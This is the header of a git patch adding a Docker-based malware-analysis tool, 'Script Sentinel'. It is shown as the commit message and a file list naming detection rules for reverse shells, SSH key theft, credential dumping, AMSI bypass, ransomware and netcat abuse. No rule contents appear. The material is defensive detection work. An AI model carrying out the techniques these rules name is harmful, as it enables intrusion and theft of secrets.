From 74eb8b25e0e22b8d801febc7cc3654a6a16c3075 Mon Sep 17 00:00:00 2001 From: aperetz Date: Sun, 23 Nov 2025 13:38:42 +0200 Subject: [PATCH 01/14] Add Script Sentinel Docker image for malware analysis - Analyzes PowerShell, Bash, and JavaScript scripts - MITRE ATT&CK technique identification - IOC extraction and XDR context - Based on demisto/python3 Alpine image - Non-root user for security - Includes verification script - Poetry-based dependency management --- docker/script-sentinel/.gitignore | 1 + docker/script-sentinel/Dockerfile | 53 + docker/script-sentinel/README.md | 44 + docker/script-sentinel/build.conf | 1 + docker/script-sentinel/docker-entrypoint.sh | 18 + docker/script-sentinel/poetry.lock | 70 + docker/script-sentinel/pyproject.toml | 20 + docker/script-sentinel/sentinel/__init__.py | 0 docker/script-sentinel/sentinel/adk_agent.py | 441 + docker/script-sentinel/sentinel/analyzer.py | 563 + .../sentinel/data/mitre_attack.json | 150 + docker/script-sentinel/sentinel/extractor.py | 438 + .../tree-sitter-javascript/.editorconfig | 46 + .../tree-sitter-javascript/.gitattributes | 42 + .../.github/FUNDING.yml | 15 + .../.github/ISSUE_TEMPLATE/bug_report.md | 31 + .../.github/ISSUE_TEMPLATE/feature_request.md | 13 + .../.github/dependabot.yml | 8 + .../.github/workflows/ci.yml | 54 + .../.github/workflows/fuzz.yml | 19 + .../.github/workflows/lint.yml | 26 + .../.github/workflows/publish.yml | 35 + .../tree-sitter-javascript/.gitignore | 47 + .../tree-sitter-javascript/CMakeLists.txt | 66 + .../tree-sitter-javascript/Cargo.lock | 199 + .../tree-sitter-javascript/Cargo.toml | 37 + .../grammars/tree-sitter-javascript/LICENSE | 21 + .../grammars/tree-sitter-javascript/Makefile | 99 + .../tree-sitter-javascript/Package.resolved | 16 + .../tree-sitter-javascript/Package.swift | 41 + .../grammars/tree-sitter-javascript/README.md | 27 + .../tree-sitter-javascript/binding.gyp | 35 + .../bindings/c/tree-sitter-javascript.pc.in | 10 + .../c/tree_sitter/tree-sitter-javascript.h | 16 + .../bindings/go/binding.go | 15 + .../bindings/go/binding_test.go | 15 + .../bindings/node/binding.cc | 19 + .../bindings/node/binding_test.js | 9 + .../bindings/node/index.d.ts | 27 + .../bindings/node/index.js | 11 + .../bindings/python/tests/test_binding.py | 11 + .../python/tree_sitter_javascript/__init__.py | 40 + .../tree_sitter_javascript/__init__.pyi | 8 + .../python/tree_sitter_javascript/binding.c | 35 + .../python/tree_sitter_javascript/py.typed | 0 .../bindings/rust/build.rs | 24 + .../bindings/rust/lib.rs | 62 + .../swift/TreeSitterJavaScript/javascript.h | 16 + .../TreeSitterJavaScriptTests.swift | 12 + .../tree-sitter-javascript/eslint.config.mjs | 5 + .../tree-sitter-javascript/examples/jquery.js | 9190 ++ .../examples/text-editor-component.js | 4446 + .../grammars/tree-sitter-javascript/go.mod | 7 + .../grammars/tree-sitter-javascript/go.sum | 34 + .../tree-sitter-javascript/grammar.js | 1324 + .../tree-sitter-javascript/package-lock.json | 1563 + .../tree-sitter-javascript/package.json | 60 + .../tree-sitter-javascript/pyproject.toml | 32 + .../queries/highlights-jsx.scm | 8 + .../queries/highlights-params.scm | 12 + .../queries/highlights.scm | 204 + .../queries/injections.scm | 31 + .../tree-sitter-javascript/queries/locals.scm | 23 + .../tree-sitter-javascript/queries/tags.scm | 99 + .../grammars/tree-sitter-javascript/setup.py | 77 + .../tree-sitter-javascript/src/grammar.json | 7261 + .../src/node-types.json | 3622 + .../tree-sitter-javascript/src/parser.c | 94268 +++++++++++ .../tree-sitter-javascript/src/scanner.c | 364 + .../src/tree_sitter/alloc.h | 54 + .../src/tree_sitter/array.h | 291 + .../src/tree_sitter/parser.h | 286 + .../test/corpus/destructuring.txt | 135 + .../test/corpus/expressions.txt | 2346 + .../test/corpus/injectables.txt | 43 + .../test/corpus/literals.txt | 173 + .../test/corpus/semicolon_insertion.txt | 309 + .../test/corpus/statements.txt | 1464 + .../test/highlight/functions.js | 48 + .../test/highlight/imports.js | 4 + .../test/highlight/injection.js | 5 + .../test/highlight/keywords.js | 12 + .../test/highlight/variables.js | 48 + .../test/tags/classes.js | 14 + .../test/tags/functions.js | 22 + .../tree-sitter-javascript/tree-sitter.json | 51 + .../tree-sitter-powershell/.editorconfig | 39 + .../grammars/tree-sitter-powershell/.envrc | 1 + .../tree-sitter-powershell/.gitattributes | 11 + .../tree-sitter-powershell/.gitignore | 11 + .../tree-sitter-powershell/Cargo.toml | 24 + .../grammars/tree-sitter-powershell/LICENSE | 21 + .../grammars/tree-sitter-powershell/Makefile | 112 + .../tree-sitter-powershell/Package.swift | 47 + .../grammars/tree-sitter-powershell/README.md | 7 + .../tree-sitter-powershell/binding.gyp | 30 + .../bindings/c/tree-sitter-powershell.h | 16 + .../bindings/c/tree-sitter-powershell.pc.in | 11 + .../bindings/go/binding.go | 13 + .../bindings/go/binding_test.go | 15 + .../tree-sitter-powershell/bindings/go/go.mod | 5 + .../bindings/node/binding.cc | 20 + .../bindings/node/index.d.ts | 28 + .../bindings/node/index.js | 7 + .../python/tree_sitter_powershell/__init__.py | 5 + .../tree_sitter_powershell/__init__.pyi | 1 + .../python/tree_sitter_powershell/binding.c | 27 + .../python/tree_sitter_powershell/py.typed | 0 .../bindings/rust/build.rs | 24 + .../bindings/rust/lib.rs | 50 + .../swift/TreeSitterPowershell/powershell.h | 16 + .../tree-sitter-powershell/flake.lock | 78 + .../grammars/tree-sitter-powershell/flake.nix | 44 + .../tree-sitter-powershell/grammar.js | 981 + .../tree-sitter-powershell/package.json | 45 + .../tree-sitter-powershell/pyproject.toml | 29 + .../queries/highlights.scm | 128 + .../grammars/tree-sitter-powershell/setup.py | 60 + .../tree-sitter-powershell/src/grammar.json | 6542 + .../src/node-types.json | 4114 + .../tree-sitter-powershell/src/parser.c | 128367 +++++++++++++++ .../tree-sitter-powershell/src/scanner.c | 71 + .../src/tree_sitter/alloc.h | 54 + .../src/tree_sitter/array.h | 290 + .../src/tree_sitter/parser.h | 266 + .../test/corpus/branch.txt | 815 + .../test/corpus/classes.txt | 238 + .../test/corpus/commands.txt | 527 + .../test/corpus/comments.txt | 209 + .../test/corpus/enum.txt | 76 + .../test/corpus/expressions.txt | 674 + .../test/corpus/functions.txt | 504 + .../test/corpus/loops.txt | 701 + .../test/corpus/number.txt | 250 + .../test/corpus/obfuscated.txt | 183 + .../test/corpus/operators.txt | 656 + .../test/corpus/pipeline_chains.txt | 106 + .../test/corpus/strings.txt | 554 + .../test/corpus/type.txt | 269 + .../test/corpus/variables.txt | 559 + .../tree-sitter-powershell/tree-sitter.json | 34 + docker/script-sentinel/sentinel/heuristics.py | 517 + .../script-sentinel/sentinel/ioc_extractor.py | 556 + docker/script-sentinel/sentinel/main.py | 227 + docker/script-sentinel/sentinel/mitre.py | 179 + docker/script-sentinel/sentinel/models.py | 304 + .../script-sentinel/sentinel/obfuscation.py | 1071 + docker/script-sentinel/sentinel/parser.py | 183 + .../sentinel/patterns/__init__.py | 19 + .../patterns/bash/bash-001-reverse-shell.yaml | 32 + .../patterns/bash/bash-002-curl-download.yaml | 31 + .../bash/bash-003-privilege-escalation.yaml | 32 + .../bash/bash-004-cron-persistence.yaml | 35 + .../patterns/bash/bash-005-ssh-key-theft.yaml | 35 + .../bash/bash-006-history-manipulation.yaml | 36 + .../bash/bash-007-password-harvesting.yaml | 36 + .../bash/bash-008-systemd-persistence.yaml | 35 + .../bash/bash-009-data-exfiltration.yaml | 36 + .../bash/bash-010-kernel-module-loading.yaml | 35 + .../bash/bash-011-process-hiding.yaml | 35 + .../bash/bash-012-network-scanning.yaml | 36 + .../patterns/bash/bash-013-log-deletion.yaml | 36 + .../bash/bash-014-container-escape.yaml | 35 + .../patterns/bash/bash-015-backdoor-user.yaml | 36 + .../patterns/bash/bash-016-dns-tunneling.yaml | 35 + .../bash/bash-017-webshell-indicators.yaml | 35 + .../bash/bash-018-suspicious-compression.yaml | 37 + .../patterns/bash/bash-019-netcat-lolbin.yaml | 33 + .../patterns/bash/bash-020-perl-lolbin.yaml | 32 + .../patterns/bash/bash-021-python-lolbin.yaml | 32 + .../bash/bash-022-file-monitoring.yaml | 32 + .../bash/bash-023-network-sniffing.yaml | 32 + .../patterns/bash/bash-024-port-scanning.yaml | 32 + .../bash/bash-025-memory-execution.yaml | 35 + .../bash/bash-026-arithmetic-encoding.yaml | 34 + .../bash/bash-027-variable-indirection.yaml | 34 + .../javascript/js-001-eval-usage.yaml | 33 + .../javascript/js-002-dynamic-script.yaml | 32 + .../javascript/js-003-obfuscation.yaml | 32 + .../js-004-function-constructor.yaml | 35 + .../javascript/js-005-document-write.yaml | 35 + .../js-006-innerhtml-assignment.yaml | 35 + .../js-007-websocket-exfiltration.yaml | 35 + .../javascript/js-008-crypto-mining.yaml | 35 + .../patterns/javascript/js-009-keylogger.yaml | 35 + .../javascript/js-010-localstorage-theft.yaml | 35 + .../javascript/js-011-iframe-injection.yaml | 35 + .../javascript/js-012-atob-decode.yaml | 35 + .../javascript/js-013-formgrabber.yaml | 35 + .../js-014-geolocation-tracking.yaml | 35 + .../js-015-clipboard-hijacking.yaml | 35 + .../js-016-browser-fingerprinting.yaml | 35 + .../js-017-prototype-pollution.yaml | 35 + .../javascript/js-018-dom-clobbering.yaml | 35 + .../javascript/js-019-cookie-theft.yaml | 34 + .../javascript/js-020-activex-lolbin.yaml | 33 + .../js-021-browser-extension-api.yaml | 37 + .../javascript/js-022-service-worker.yaml | 36 + .../javascript/js-023-webassembly.yaml | 38 + .../javascript/js-024-dom-clobbering.yaml | 36 + .../js-025-string-fromcharcode.yaml | 34 + .../javascript/js-026-anti-debugging.yaml | 34 + .../js-027-boolean-algebra-obfuscation.yaml | 34 + .../js-028-control-flow-flattening.yaml | 35 + .../js-029-suspicious-long-strings.yaml | 33 + .../sentinel/patterns/loader.py | 293 + .../sentinel/patterns/models.py | 180 + .../powershell/ps-001-invoke-expression.yaml | 34 + .../powershell/ps-002-base64-encoded.yaml | 30 + .../powershell/ps-003-download-cradle.yaml | 30 + .../ps-004-registry-persistence.yaml | 35 + .../powershell/ps-005-wmi-execution.yaml | 35 + .../powershell/ps-006-process-injection.yaml | 36 + .../powershell/ps-007-credential-dumping.yaml | 36 + .../powershell/ps-008-scheduled-task.yaml | 35 + .../ps-009-powershell-remoting.yaml | 36 + .../powershell/ps-010-amsi-bypass.yaml | 35 + .../powershell/ps-011-logging-evasion.yaml | 35 + .../powershell/ps-012-reflective-loading.yaml | 35 + .../powershell/ps-013-com-object-abuse.yaml | 35 + .../powershell/ps-014-hidden-window.yaml | 35 + .../powershell/ps-015-clipboard-access.yaml | 35 + .../powershell/ps-016-network-share-enum.yaml | 36 + .../ps-017-service-manipulation.yaml | 36 + .../powershell/ps-018-token-manipulation.yaml | 37 + .../patterns/powershell/ps-019-keylogger.yaml | 33 + .../powershell/ps-020-ransomware.yaml | 35 + .../powershell/ps-021-bitsadmin-lolbin.yaml | 32 + .../powershell/ps-022-mshta-lolbin.yaml | 33 + .../powershell/ps-023-regsvr32-lolbin.yaml | 32 + .../powershell/ps-024-rundll32-lolbin.yaml | 32 + .../powershell/ps-025-process-monitoring.yaml | 32 + .../ps-026-registry-monitoring.yaml | 33 + .../powershell/ps-027-network-scanning.yaml | 33 + .../powershell/ps-028-certutil-download.yaml | 35 + .../ps-030-reflective-dll-injection.yaml | 35 + .../powershell/ps-031-process-hollowing.yaml | 36 + .../ps-032-embedded-binary-execution.yaml | 35 + .../sentinel/patterns/registry.py | 274 + .../sentinel/patterns/schema.yaml | 144 + .../sentinel/reporters/__init__.py | 14 + .../sentinel/reporters/console_reporter.py | 590 + .../sentinel/reporters/json_reporter.py | 204 + .../sentinel/reporters/markdown_reporter.py | 562 + docker/script-sentinel/sentinel/sanitizer.py | 364 + docker/script-sentinel/sentinel/verdict.py | 341 + docker/script-sentinel/verify.py | 19 + docker/script-sentinel/xsiam_wrapper.py | 495 + 248 files changed, 288434 insertions(+) create mode 100644 docker/script-sentinel/.gitignore create mode 100644 docker/script-sentinel/Dockerfile create mode 100644 docker/script-sentinel/README.md create mode 100644 docker/script-sentinel/build.conf create mode 100644 docker/script-sentinel/docker-entrypoint.sh create mode 100644 docker/script-sentinel/poetry.lock create mode 100644 docker/script-sentinel/pyproject.toml create mode 100644 docker/script-sentinel/sentinel/__init__.py create mode 100644 docker/script-sentinel/sentinel/adk_agent.py create mode 100644 docker/script-sentinel/sentinel/analyzer.py create mode 100644 docker/script-sentinel/sentinel/data/mitre_attack.json create mode 100644 docker/script-sentinel/sentinel/extractor.py create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/.editorconfig create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/.gitattributes create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/.github/FUNDING.yml create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/.github/ISSUE_TEMPLATE/bug_report.md create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/.github/ISSUE_TEMPLATE/feature_request.md create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/.github/dependabot.yml create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/.github/workflows/ci.yml create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/.github/workflows/fuzz.yml create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/.github/workflows/lint.yml create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/.github/workflows/publish.yml create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/.gitignore create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/CMakeLists.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/Cargo.lock create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/Cargo.toml create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/LICENSE create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/Makefile create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/Package.resolved create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/Package.swift create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/README.md create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/binding.gyp create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/c/tree-sitter-javascript.pc.in create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/c/tree_sitter/tree-sitter-javascript.h create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/go/binding.go create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/go/binding_test.go create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/node/binding.cc create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/node/binding_test.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/node/index.d.ts create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/node/index.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/python/tests/test_binding.py create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/python/tree_sitter_javascript/__init__.py create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/python/tree_sitter_javascript/__init__.pyi create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/python/tree_sitter_javascript/binding.c create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/python/tree_sitter_javascript/py.typed create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/rust/build.rs create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/rust/lib.rs create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/swift/TreeSitterJavaScript/javascript.h create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/bindings/swift/TreeSitterJavaScriptTests/TreeSitterJavaScriptTests.swift create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/eslint.config.mjs create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/examples/jquery.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/examples/text-editor-component.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/go.mod create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/go.sum create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/grammar.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/package-lock.json create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/package.json create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/pyproject.toml create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/queries/highlights-jsx.scm create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/queries/highlights-params.scm create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/queries/highlights.scm create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/queries/injections.scm create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/queries/locals.scm create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/queries/tags.scm create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/setup.py create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/src/grammar.json create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/src/node-types.json create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/src/parser.c create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/src/scanner.c create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/src/tree_sitter/alloc.h create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/src/tree_sitter/array.h create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/src/tree_sitter/parser.h create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/corpus/destructuring.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/corpus/expressions.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/corpus/injectables.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/corpus/literals.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/corpus/semicolon_insertion.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/corpus/statements.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/highlight/functions.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/highlight/imports.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/highlight/injection.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/highlight/keywords.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/highlight/variables.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/tags/classes.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/test/tags/functions.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-javascript/tree-sitter.json create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/.editorconfig create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/.envrc create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/.gitattributes create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/.gitignore create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/Cargo.toml create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/LICENSE create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/Makefile create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/Package.swift create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/README.md create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/binding.gyp create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/c/tree-sitter-powershell.h create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/c/tree-sitter-powershell.pc.in create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/go/binding.go create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/go/binding_test.go create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/go/go.mod create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/node/binding.cc create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/node/index.d.ts create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/node/index.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/python/tree_sitter_powershell/__init__.py create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/python/tree_sitter_powershell/__init__.pyi create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/python/tree_sitter_powershell/binding.c create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/python/tree_sitter_powershell/py.typed create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/rust/build.rs create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/rust/lib.rs create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/bindings/swift/TreeSitterPowershell/powershell.h create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/flake.lock create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/flake.nix create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/grammar.js create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/package.json create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/pyproject.toml create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/queries/highlights.scm create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/setup.py create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/src/grammar.json create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/src/node-types.json create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/src/parser.c create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/src/scanner.c create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/src/tree_sitter/alloc.h create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/src/tree_sitter/array.h create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/src/tree_sitter/parser.h create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/branch.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/classes.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/commands.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/comments.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/enum.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/expressions.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/functions.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/loops.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/number.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/obfuscated.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/operators.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/pipeline_chains.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/strings.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/type.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/test/corpus/variables.txt create mode 100644 docker/script-sentinel/sentinel/grammars/tree-sitter-powershell/tree-sitter.json create mode 100644 docker/script-sentinel/sentinel/heuristics.py create mode 100644 docker/script-sentinel/sentinel/ioc_extractor.py create mode 100755 docker/script-sentinel/sentinel/main.py create mode 100644 docker/script-sentinel/sentinel/mitre.py create mode 100644 docker/script-sentinel/sentinel/models.py create mode 100644 docker/script-sentinel/sentinel/obfuscation.py create mode 100644 docker/script-sentinel/sentinel/parser.py create mode 100644 docker/script-sentinel/sentinel/patterns/__init__.py create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-001-reverse-shell.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-002-curl-download.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-003-privilege-escalation.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-004-cron-persistence.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-005-ssh-key-theft.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-006-history-manipulation.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-007-password-harvesting.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-008-systemd-persistence.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-009-data-exfiltration.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-010-kernel-module-loading.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-011-process-hiding.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-012-network-scanning.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-013-log-deletion.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-014-container-escape.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-015-backdoor-user.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-016-dns-tunneling.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-017-webshell-indicators.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-018-suspicious-compression.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-019-netcat-lolbin.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-020-perl-lolbin.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-021-python-lolbin.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-022-file-monitoring.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-023-network-sniffing.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-024-port-scanning.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-025-memory-execution.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-026-arithmetic-encoding.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/bash/bash-027-variable-indirection.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-001-eval-usage.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-002-dynamic-script.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-003-obfuscation.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-004-function-constructor.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-005-document-write.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-006-innerhtml-assignment.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-007-websocket-exfiltration.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-008-crypto-mining.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-009-keylogger.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-010-localstorage-theft.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-011-iframe-injection.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-012-atob-decode.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-013-formgrabber.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-014-geolocation-tracking.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-015-clipboard-hijacking.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-016-browser-fingerprinting.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-017-prototype-pollution.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-018-dom-clobbering.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-019-cookie-theft.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-020-activex-lolbin.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-021-browser-extension-api.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-022-service-worker.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-023-webassembly.yaml create mode 100644 docker/script-sentinel/sentinel/patterns/javascript/js-024-dom-clobbering.yaml create mode 100644 